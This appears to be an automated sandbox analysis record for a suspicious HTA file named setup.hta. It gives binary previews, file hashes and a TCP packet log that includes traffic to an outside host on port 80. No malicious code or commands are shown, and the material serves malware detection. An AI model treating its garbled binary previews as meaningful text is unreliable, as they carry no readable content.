Preview:	.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6....Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6.....,xz.._......B."#...L(n..f..Yb....8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o..........x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.....-.A.}.......I .P.....S....\|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.\|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4\|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.

Static File Info

General

File type:	data
Entropy (8bit):	6.206106295767242
TrID:
File name:	setup.hta
File size:	73'556 bytes
MD5:	bde81fba29e56db0dd8fe36fffa8c3c0
SHA1:	3da0fb3b154eefc03ad4448b5d5809d8c3d22061
SHA256:	79ae52b1bbf60846666893fa94f3a07252156d6ee385fc3bd8aab3370eea1ca7
SHA512:	adbac013b916043503462570d0fcde32dae0211c44e2101818cd4001e8597b73a75df15589a753ac717b31238cb86fa9851b7d84f9ebd0456115a2e9be68eb58
SSDEEP:	768:CgGCA1uEYO/QHw+vsxX+auhwF+/unhi1zOz:C4EYO4FsxbvFti5Oz
TLSH:	34738582BE546992DD8051B91E11830B97F3CE86F41FCFBE22173694D4B6DD28CB66E0
File Content Preview:	.p+.=LL.`.iZH....g...T...$E.Lu^.. .....x.z <........8..^.....G....e'..B.. ..3y.f.R9.s.r1.p.D2.q..5.5Of..c...2.*A.Y....w.L3.....).....t.0szBo.Y..F.a.........\:.e9.i..,pnBR@...n.4.]9......?#...8..6..w5.W...}Du.>..q...G.x...L.F~........D..YZs......b[8...v.K-

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 21, 2024 08:13:59.435673952 CET	49674	443	192.168.2.5	23.1.237.91
Feb 21, 2024 08:13:59.435688972 CET	49675	443	192.168.2.5	23.1.237.91
Feb 21, 2024 08:13:59.529571056 CET	49673	443	192.168.2.5	23.1.237.91
Feb 21, 2024 08:14:05.593410969 CET	49708	443	192.168.2.5	104.21.79.229
Feb 21, 2024 08:14:05.593471050 CET	443	49708	104.21.79.229	192.168.2.5
Feb 21, 2024 08:14:05.593569994 CET	49708	443	192.168.2.5	104.21.79.229
Feb 21, 2024 08:14:05.595556974 CET	49708	443	192.168.2.5	104.21.79.229
Feb 21, 2024 08:14:05.595575094 CET	443	49708	104.21.79.229	192.168.2.5
Feb 21, 2024 08:14:05.601304054 CET	49711	443	192.168.2.5	142.251.163.84
Feb 21, 2024 08:14:05.601305962 CET	49710	443	192.168.2.5	142.251.40.174
Feb 21, 2024 08:14:05.601324081 CET	443	49711	142.251.163.84	192.168.2.5
Feb 21, 2024 08:14:05.601341963 CET	443	49710	142.251.40.174	192.168.2.5
Feb 21, 2024 08:14:05.601404905 CET	49711	443	192.168.2.5	142.251.163.84
Feb 21, 2024 08:14:05.601478100 CET	49710	443	192.168.2.5	142.251.40.174
Feb 21, 2024 08:14:05.601967096 CET	49710	443	192.168.2.5	142.251.40.174
Feb 21, 2024 08:14:05.601978064 CET	443	49710	142.251.40.174	192.168.2.5
Feb 21, 2024 08:14:05.602225065 CET	49711	443	192.168.2.5	142.251.163.84
Feb 21, 2024 08:14:05.602235079 CET	443	49711	142.251.163.84	192.168.2.5
Feb 21, 2024 08:14:05.810185909 CET	443	49708	104.21.79.229	192.168.2.5
Feb 21, 2024 08:14:05.817910910 CET	49712	443	192.168.2.5	23.51.58.94
Feb 21, 2024 08:14:05.817960978 CET	443	49712	23.51.58.94	192.168.2.5
Feb 21, 2024 08:14:05.818048000 CET	49712	443	192.168.2.5	23.51.58.94
Feb 21, 2024 08:14:05.821408987 CET	49712	443	192.168.2.5	23.51.58.94
Feb 21, 2024 08:14:05.821450949 CET	443	49712	23.51.58.94	192.168.2.5
Feb 21, 2024 08:14:05.825464010 CET	49708	443	192.168.2.5	104.21.79.229
Feb 21, 2024 08:14:05.825495958 CET	443	49708	104.21.79.229	192.168.2.5
Feb 21, 2024 08:14:05.827392101 CET	443	49708	104.21.79.229	192.168.2.5
Feb 21, 2024 08:14:05.827483892 CET	49708	443	192.168.2.5	104.21.79.229
Feb 21, 2024 08:14:05.843724012 CET	49708	443	192.168.2.5	104.21.79.229
Feb 21, 2024 08:14:05.843890905 CET	443	49708	104.21.79.229	192.168.2.5
Feb 21, 2024 08:14:05.847343922 CET	49708	443	192.168.2.5	104.21.79.229
Feb 21, 2024 08:14:05.847354889 CET	443	49708	104.21.79.229	192.168.2.5
Feb 21, 2024 08:14:05.868498087 CET	443	49711	142.251.163.84	192.168.2.5
Feb 21, 2024 08:14:05.870285988 CET	49711	443	192.168.2.5	142.251.163.84
Feb 21, 2024 08:14:05.870310068 CET	443	49711	142.251.163.84	192.168.2.5
Feb 21, 2024 08:14:05.871875048 CET	443	49711	142.251.163.84	192.168.2.5
Feb 21, 2024 08:14:05.872211933 CET	49711	443	192.168.2.5	142.251.163.84
Feb 21, 2024 08:14:05.880068064 CET	49711	443	192.168.2.5	142.251.163.84
Feb 21, 2024 08:14:05.880319118 CET	49711	443	192.168.2.5	142.251.163.84
Feb 21, 2024 08:14:05.880328894 CET	443	49711	142.251.163.84	192.168.2.5
Feb 21, 2024 08:14:05.880381107 CET	443	49711	142.251.163.84	192.168.2.5
Feb 21, 2024 08:14:05.888025045 CET	443	49710	142.251.40.174	192.168.2.5
Feb 21, 2024 08:14:05.888394117 CET	49710	443	192.168.2.5	142.251.40.174
Feb 21, 2024 08:14:05.888408899 CET	443	49710	142.251.40.174	192.168.2.5
Feb 21, 2024 08:14:05.888923883 CET	443	49710	142.251.40.174	192.168.2.5
Feb 21, 2024 08:14:05.889027119 CET	49710	443	192.168.2.5	142.251.40.174
Feb 21, 2024 08:14:05.889931917 CET	443	49710	142.251.40.174	192.168.2.5
Feb 21, 2024 08:14:05.890188932 CET	49710	443	192.168.2.5	142.251.40.174
Feb 21, 2024 08:14:05.891598940 CET	49708	443	192.168.2.5	104.21.79.229
Feb 21, 2024 08:14:05.894965887 CET	49710	443	192.168.2.5	142.251.40.174
Feb 21, 2024 08:14:05.895128965 CET	443	49710	142.251.40.174	192.168.2.5
Feb 21, 2024 08:14:05.895390987 CET	49710	443	192.168.2.5	142.251.40.174
Feb 21, 2024 08:14:05.895400047 CET	443	49710	142.251.40.174	192.168.2.5
Feb 21, 2024 08:14:05.924437046 CET	49711	443	192.168.2.5	142.251.163.84
Feb 21, 2024 08:14:05.924453974 CET	443	49711	142.251.163.84	192.168.2.5
Feb 21, 2024 08:14:05.941663980 CET	49710	443	192.168.2.5	142.251.40.174
Feb 21, 2024 08:14:05.972199917 CET	49711	443	192.168.2.5	142.251.163.84
Feb 21, 2024 08:14:06.015120029 CET	443	49712	23.51.58.94	192.168.2.5
Feb 21, 2024 08:14:06.015356064 CET	49712	443	192.168.2.5	23.51.58.94
Feb 21, 2024 08:14:06.018704891 CET	49712	443	192.168.2.5	23.51.58.94
Feb 21, 2024 08:14:06.018718004 CET	443	49712	23.51.58.94	192.168.2.5
Feb 21, 2024 08:14:06.018982887 CET	443	49712	23.51.58.94	192.168.2.5
Feb 21, 2024 08:14:06.066808939 CET	49712	443	192.168.2.5	23.51.58.94
Feb 21, 2024 08:14:06.112576962 CET	49712	443	192.168.2.5	23.51.58.94
Feb 21, 2024 08:14:06.151470900 CET	443	49711	142.251.163.84	192.168.2.5
Feb 21, 2024 08:14:06.151873112 CET	443	49711	142.251.163.84	192.168.2.5
Feb 21, 2024 08:14:06.152127028 CET	49711	443	192.168.2.5	142.251.163.84
Feb 21, 2024 08:14:06.153904915 CET	443	49712	23.51.58.94	192.168.2.5
Feb 21, 2024 08:14:06.153954029 CET	49711	443	192.168.2.5	142.251.163.84
Feb 21, 2024 08:14:06.153973103 CET	443	49711	142.251.163.84	192.168.2.5
Feb 21, 2024 08:14:06.172224998 CET	443	49710	142.251.40.174	192.168.2.5
Feb 21, 2024 08:14:06.172400951 CET	443	49710	142.251.40.174	192.168.2.5
Feb 21, 2024 08:14:06.172527075 CET	49710	443	192.168.2.5	142.251.40.174
Feb 21, 2024 08:14:06.173275948 CET	49710	443	192.168.2.5	142.251.40.174
Feb 21, 2024 08:14:06.173290014 CET	443	49710	142.251.40.174	192.168.2.5
Feb 21, 2024 08:14:06.202431917 CET	443	49712	23.51.58.94	192.168.2.5
Feb 21, 2024 08:14:06.202543974 CET	443	49712	23.51.58.94	192.168.2.5
Feb 21, 2024 08:14:06.203149080 CET	49712	443	192.168.2.5	23.51.58.94
Feb 21, 2024 08:14:06.228454113 CET	49712	443	192.168.2.5	23.51.58.94
Feb 21, 2024 08:14:06.228478909 CET	443	49712	23.51.58.94	192.168.2.5
Feb 21, 2024 08:14:06.228542089 CET	49712	443	192.168.2.5	23.51.58.94
Feb 21, 2024 08:14:06.228549957 CET	443	49712	23.51.58.94	192.168.2.5
Feb 21, 2024 08:14:06.291537046 CET	49713	443	192.168.2.5	23.51.58.94
Feb 21, 2024 08:14:06.291584969 CET	443	49713	23.51.58.94	192.168.2.5
Feb 21, 2024 08:14:06.291759014 CET	49713	443	192.168.2.5	23.51.58.94
Feb 21, 2024 08:14:06.292776108 CET	49713	443	192.168.2.5	23.51.58.94
Feb 21, 2024 08:14:06.292787075 CET	443	49713	23.51.58.94	192.168.2.5
Feb 21, 2024 08:14:06.405080080 CET	443	49708	104.21.79.229	192.168.2.5
Feb 21, 2024 08:14:06.405174017 CET	443	49708	104.21.79.229	192.168.2.5
Feb 21, 2024 08:14:06.405323029 CET	49708	443	192.168.2.5	104.21.79.229
Feb 21, 2024 08:14:06.407876015 CET	49708	443	192.168.2.5	104.21.79.229
Feb 21, 2024 08:14:06.407897949 CET	443	49708	104.21.79.229	192.168.2.5
Feb 21, 2024 08:14:06.477431059 CET	443	49713	23.51.58.94	192.168.2.5
Feb 21, 2024 08:14:06.477643967 CET	49713	443	192.168.2.5	23.51.58.94
Feb 21, 2024 08:14:06.482319117 CET	49713	443	192.168.2.5	23.51.58.94
Feb 21, 2024 08:14:06.482342005 CET	443	49713	23.51.58.94	192.168.2.5
Feb 21, 2024 08:14:06.482639074 CET	443	49713	23.51.58.94	192.168.2.5
Feb 21, 2024 08:14:06.484679937 CET	49713	443	192.168.2.5	23.51.58.94
Feb 21, 2024 08:14:06.501992941 CET	49714	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:06.502028942 CET	443	49714	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:06.502130032 CET	49714	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:06.505929947 CET	49714	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:06.505947113 CET	443	49714	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:06.529917002 CET	443	49713	23.51.58.94	192.168.2.5
Feb 21, 2024 08:14:06.660243034 CET	443	49713	23.51.58.94	192.168.2.5
Feb 21, 2024 08:14:06.660448074 CET	443	49713	23.51.58.94	192.168.2.5
Feb 21, 2024 08:14:06.660573006 CET	49713	443	192.168.2.5	23.51.58.94
Feb 21, 2024 08:14:06.696530104 CET	443	49714	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:06.712640047 CET	49714	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:06.712652922 CET	443	49714	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:06.713912010 CET	443	49714	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:06.714008093 CET	49714	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:06.725693941 CET	49714	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:06.725913048 CET	443	49714	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:06.726062059 CET	49714	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:06.726073980 CET	443	49714	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:06.762866974 CET	49713	443	192.168.2.5	23.51.58.94
Feb 21, 2024 08:14:06.762939930 CET	443	49713	23.51.58.94	192.168.2.5
Feb 21, 2024 08:14:06.818418980 CET	49714	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:07.298660994 CET	443	49714	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.298744917 CET	49714	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:07.298764944 CET	443	49714	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.298787117 CET	443	49714	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.298845053 CET	49714	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:07.302582979 CET	49714	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:07.302601099 CET	443	49714	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.306322098 CET	49715	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:07.306416988 CET	443	49715	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.306521893 CET	49715	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:07.306952000 CET	49715	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:07.306986094 CET	443	49715	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.498672962 CET	443	49715	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.501863956 CET	49715	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:07.501894951 CET	443	49715	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.502350092 CET	443	49715	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.503202915 CET	49715	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:07.503293991 CET	443	49715	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.503926992 CET	49715	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:07.549909115 CET	443	49715	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.639350891 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:07.713249922 CET	443	49715	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.713296890 CET	443	49715	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.713337898 CET	443	49715	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.713367939 CET	49715	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:07.713393927 CET	443	49715	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.713407040 CET	443	49715	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.713447094 CET	49715	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:07.714665890 CET	49715	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:07.714680910 CET	443	49715	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.788813114 CET	49717	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:07.788866997 CET	443	49717	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.788949013 CET	49717	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:07.789504051 CET	49717	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:07.789519072 CET	443	49717	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.854590893 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:07.854693890 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:07.856656075 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:07.975562096 CET	443	49717	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.976104975 CET	49717	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:07.976130962 CET	443	49717	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.976474047 CET	443	49717	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.976851940 CET	49717	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:07.976914883 CET	443	49717	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:07.977243900 CET	49717	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:08.021915913 CET	443	49717	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:08.071790934 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.072309971 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.072328091 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.072341919 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.072357893 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.072375059 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.072390079 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.072449923 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.072527885 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.072550058 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.072559118 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.072590113 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.072599888 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.072685003 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.180248022 CET	443	49717	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:08.180418968 CET	443	49717	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:08.180495977 CET	49717	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:08.181936026 CET	49717	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:08.181952953 CET	443	49717	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:08.287698030 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.287718058 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.287730932 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.287761927 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.287772894 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.287810087 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.287838936 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.287880898 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.287910938 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.287940025 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.287950039 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.287992954 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.288011074 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.288091898 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.288105011 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.288120985 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.288145065 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.288167000 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.288173914 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.288203001 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.288225889 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.288264990 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.288279057 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.288310051 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.288312912 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.288324118 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.288356066 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.288360119 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.288399935 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.288489103 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.503081083 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503113031 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503129959 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503143072 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503158092 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503170967 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503184080 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503197908 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503237009 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.503237009 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.503242970 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503257036 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503312111 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503324986 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503336906 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503348112 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.503365993 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503390074 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503446102 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.503446102 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.503515959 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503528118 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503540039 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503552914 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503571987 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.503575087 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503587961 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.503591061 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503603935 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503639936 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503664970 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.503664970 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.503681898 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503695965 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503868103 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.503928900 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.504045010 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.504240990 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.504252911 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.504272938 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.504287004 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.504318953 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.504337072 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.509380102 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.509397984 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.509411097 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.509424925 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.509438992 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.509453058 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.509465933 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.509469986 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.509469986 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.509494066 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.509506941 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.509520054 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.509548903 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.509548903 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.509634018 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.718322992 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.718426943 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.718444109 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.718456030 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.718496084 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.718508959 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.718534946 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.718558073 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.718610048 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.718616009 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.718631029 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.718657970 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.718658924 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.718733072 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.718755007 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.718775034 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.718816996 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.718818903 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.718831062 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.718858004 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.718872070 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.718884945 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.718902111 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.718964100 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.718976974 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.718988895 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719012976 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719012976 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.719012976 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.719027996 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719039917 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719063044 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.719085932 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719099998 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719113111 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719139099 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.719139099 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.719153881 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719203949 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.719230890 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719250917 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719269037 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719326019 CET	80	49716	5.101.153.86	192.168.2.5
